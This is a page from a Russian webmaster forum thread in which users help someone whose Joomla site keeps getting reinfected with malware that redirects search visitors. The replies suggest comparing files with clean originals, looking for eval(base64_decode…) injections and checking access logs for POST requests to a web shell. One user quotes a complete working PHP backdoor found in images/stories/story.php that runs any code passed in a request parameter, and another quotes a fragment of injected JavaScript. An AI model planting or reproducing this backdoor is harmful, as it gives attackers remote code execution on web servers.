Форум Сайтостроение Веб-строительство

Вирус на сайте, с гугла переправляет на сторонние сайты

1234 5
marsh
На сайте с 03.11.2009
Offline
77
marsh
#11

Компонент JCE стоит в joomla? В папке /images/stories/ есть файл story.php с кодом: 

<?php 

if (isset($_REQUEST['p1'])) {

   eval(stripslashes($_REQUEST['p1']));

} else {

   echo "djeu84m";

}

?>
С уважением, Марат.
O
На сайте с 18.11.2012
Offline
14
olleggatoor
#12

мой совет, не поленитесь скачать с фтп весь движок и сравнить с оригиналом, есть специальные проги, а пароль менять смысла нету если ето гомно там.

fellowes
На сайте с 19.06.2012
Offline
23
fellowes
#13

Проверьте php файлики на предмет вредоносного кода, типа eval(base64_decode...

Тут скрипт есть для проверки, думаю поможет Вам. Вот статья по теме на хабре.

S
На сайте с 08.09.2009
Offline
168
specc
#14
marsh:
Компонент JCE стоит в joomla? В папке /images/stories/ есть файл story.php с кодом: 
<?php 

if (isset($_REQUEST['p1'])) {

   eval(stripslashes($_REQUEST['p1']));

} else {

   echo "djeu84m";

}

?>

щас посмотрю

---------- Добавлено 17.01.2013 в 20:48 ----------

olleggatoor:
мой совет, не поленитесь скачать с фтп весь движок и сравнить с оригиналом, есть специальные проги, а пароль менять смысла нету если ето гомно там.

я полностью удалил цмс и заново залил годичной давности, а проблему заметил на новый год, вроде убрал, но сейчас опять вылезло.

---------- Добавлено 17.01.2013 в 20:49 ----------

fellowes:
Проверьте php файлики на предмет вредоносного кода, типа eval(base64_decode...
Тут скрипт есть для проверки, думаю поможет Вам. Вот статья по теме на хабре.

по фтп файлы не открывает касперский пишет что троян

Сайты на Joomla лежат. Подмена ссылок в поисковой ФО Easy-Share - скачки,
O
На сайте с 18.11.2012
Offline
14
olleggatoor
#15

ну так к себе скачайте на комп и сравните, а Каспера думаю знаете как отключить.

marsh
На сайте с 03.11.2009
Offline
77
marsh
#16
specc:
я полностью удалил цмс и заново залил годичной давности, а проблему заметил на новый год, вроде убрал, но сейчас опять вылезло.

После того как годичной давности залили обновили до последней версии?

S
На сайте с 08.09.2009
Offline
168
specc
#17
specc:
щас посмотрю

---------- Добавлено 17.01.2013 в 20:48 ----------



я полностью удалил цмс и заново залил годичной давности, а проблему заметил на новый год, вроде убрал, но сейчас опять вылезло.

---------- Добавлено 17.01.2013 в 20:49 ----------


по фтп файлы не открывает касперский пишет что троян

JCE не стоит

---------- Добавлено 17.01.2013 в 21:01 ----------

marsh:
После того как годичной давности залили обновили до последней версии?

обновил до 1.5.26, боюсь если поставить последнюю версию могут измениться урлы

---------- Добавлено 17.01.2013 в 21:08 ----------

olleggatoor:
ну так к себе скачайте на комп и сравните, а Каспера думаю знаете как отключить.

зачем качать, если и так ясно что файлы заражены, я писал что удалял и заливал все заново, какое то время все хорошо, потом опять все заражено.

---------- Добавлено 17.01.2013 в 21:19 ----------

Nayteri:
У меня как-то заразился сайт клинета, правда всего оилн ищза всю практику, пришло кака кидиотке вручяную силдить перебирать усе .js скипты которые были в сайте и в конце каждого удалть код function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+... прятногт мало, ноговолрят есть скирпт, я правда никаким языками не владею, но он есть. короче я чустила вручную, часов 15-20 так точно ушло.
(тоже была joomla правла ренее где-то 1.5.23 или около того, короче даже гугл выдлавал типа "заходлить опасно все дела" почиститила все .jsб обновила до последней 1.5.26 плюс напиcfла хостеру , чтобызапретил доступ по фтп вроде полет нормальный - гугл с яндесом смилостивились вернули сайт в поиск без предупреждений).

была джумла 1.5.23 обновил до 1.5.26

На сайте Trojan-Clicker.HTML.Agent.bt. Как Переезд на новый домен JakoDorgen PRO и JakoDorgen
WebGomel
На сайте с 29.10.2011
Offline
78
WebGomel
#18
specc:

зачем качать, если и так ясно что файлы заражены, я писал что удалял и заливал все заново, какое то время все хорошо, потом опять все заражено.

Правильно. Во всех php файлах у вас дописан код типа eval(base64_decode... Если его расшифровать, то это и есть код редиректа.

Дописывается эта гадость через шелл или бэкдор, залитый на любой из сайтов на аккаунте.

Хотите быстро найти его - смотрите логи запросов к сайтам. Найти легко - к этому файлу будут запросы POST, а не GET.

То что вы перезалили джумлу - ничего не значит, шелл там уже мог быть/он мог быть не в джумле/у хостера криво настроен сервер - вариантов масса, но без логов всё это просто догадки.

Удалённый системный администратор ( https://remadmin.com )
Яндекс.Поиск о скрытых спам-ссылках Распространённые ошибки веб-мастеров при Все, что вам нужно
S
На сайте с 08.09.2009
Offline
168
specc
#19
WebGomel:
Правильно. Во всех php файлах у вас дописан код типа eval(base64_decode... Если его расшифровать, то это и есть код редиректа.
Дописывается эта гадость через шелл или бэкдор, залитый на любой из сайтов на аккаунте.
Хотите быстро найти его - смотрите логи запросов к сайтам. Найти легко - к этому файлу будут запросы POST, а не GET.
То что вы перезалили джумлу - ничего не значит, шелл там уже мог быть/он мог быть не в джумле/у хостера криво настроен сервер - вариантов масса, но без логов всё это просто догадки.

HTTP логи?

WebGomel
На сайте с 29.10.2011
Offline
78
WebGomel
#20
specc:
HTTP логи?

Да, access.log например.

1234 5

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий